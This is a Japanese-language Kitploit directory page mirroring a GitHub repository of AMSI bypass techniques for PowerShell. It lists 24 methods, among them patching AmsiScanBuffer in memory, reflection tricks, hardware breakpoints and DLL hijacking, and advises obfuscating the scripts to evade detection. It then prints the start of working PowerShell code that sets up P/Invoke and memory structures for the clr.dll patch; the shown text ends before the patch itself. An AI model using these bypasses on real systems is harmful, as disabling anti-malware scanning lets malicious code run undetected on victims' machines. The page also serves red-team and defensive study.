Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Amsi-Bypass-Powershell — このリポジトリには、さまざまなブログ投稿で見つけたAmsi Bypass手法が含まれています。 | Kitploit
ツール/GitHubGitHub/s3cur3th1ssh1t/amsi-bypass-powershell
防御ツールエクスプロイトIDS/IPS回避レッドチーミングペイロード開発
GitHubs3cur3th1ssh1t/amsi-bypass-powershell

Amsi-Bypass-Powershell

このリポジトリには、さまざまなブログ投稿で見つけたAmsi Bypass手法が含まれています。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
2.2k333681年前Kitploit レビュー済み

スポンサー提供

     

Amsi-Bypass-Powershell

このリポジトリには、さまざまなブログ記事で見つけたAntimalware Scan Interface (AMSI)のバイパス/回避方法がいくつか含まれています。

ほとんどのスクリプトはAMSI自体によって検出されます。そのため、トリガーを見つけ、変数/関数の名前変更、文字列置換、または実行時のエンコードおよびデコードによって署名部分を変更する必要があります。あるいは、ISESteroidsやInvoke-Obfuscationを使用して難読化し、動作させることができます。また、手動で署名を変更して有効なバイパスを再取得する方法についての私のブログ記事もご覧ください。

  1. clr.dll内のAmsiScanBufferへのパッチ適用
  2. ScriptBlock Smuggling
  3. Reflection ScanContent Change
  4. ハードウェアブレークポイントの使用
  5. CLRフッキングの使用
  6. Microsoft MpOav.dllのプロバイダーDLLにパッチ適用
  7. スキャンインターセプトとプロバイダー関数パッチ
  8. rasta-mouseによるAMSI AmsiScanBufferへのパッチ適用
  9. AMSI AmsiOpenSessionへのパッチ適用
  10. net webclientの不使用 - これはもう動作しません
  11. Amsi ScanBuffer Patch 出典 -> https://www.contextis.com/de/blog/amsi-bypass
  12. エラーの強制
  13. スクリプトログの無効化
  14. Amsi Buffer Patch - メモリ内
  15. 6と同じですが、Base64の代わりに整数バイトを使用
  16. Matt GraeberのReflectionメソッドの使用
  17. WMF5自動ログバイパスを使用したMatt GraeberのReflectionメソッド
  18. Matt Graeberの2番目のReflectionメソッドの使用
  19. Cornelis de PlaaのDLLハイジャックメソッドの使用
  20. PowerShellバージョン2を使用 - AMSIサポートなし
  21. Nishang all in one
  22. Adam Chesters Patch
  23. 3. Amsi ScanBufferの修正版 - CSC.exeコンパイルなし
  24. System.Management.Automation.dll内のAmsiScanBufferアドレスへのパッチ適用

CLRへのパッチ適用

  • こちらで説明 メモリ内のCLR DLLの変更```powershell

Define Constants

$PAGE_READONLY = 0x02 $PAGE_READWRITE = 0x04 $PAGE_EXECUTE_READWRITE = 0x40 $PAGE_EXECUTE_READ = 0x20 $PAGE_GUARD = 0x100 $MEM_COMMIT = 0x1000 $MAX_PATH = 260

Helper functions

function IsReadable { param ($protect, $state) return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT) }

function PatternMatch { param ($buffer, $pattern, $index) for ($i = 0; $i -lt $pattern.Length; $i++) { if ($buffer[$index + $i] -ne $pattern[$i]) { return $false } } return $true }

if ($PSVersionTable.PSVersion.Major -gt 2) { # Create module builder $DynAssembly = New-Object System.Reflection.AssemblyName("Win32") $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
$MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()

# Define structs
$TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
$SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()

# P/Invoke Methods
$TypeBuilder = $ModuleBuilder.DefineType("Win32.Kernel32", "Public, Class")
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError")
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, "kernel32.dll", [Reflection.FieldInfo[]]@($SetLastError), @($True))
ツールをダウンロード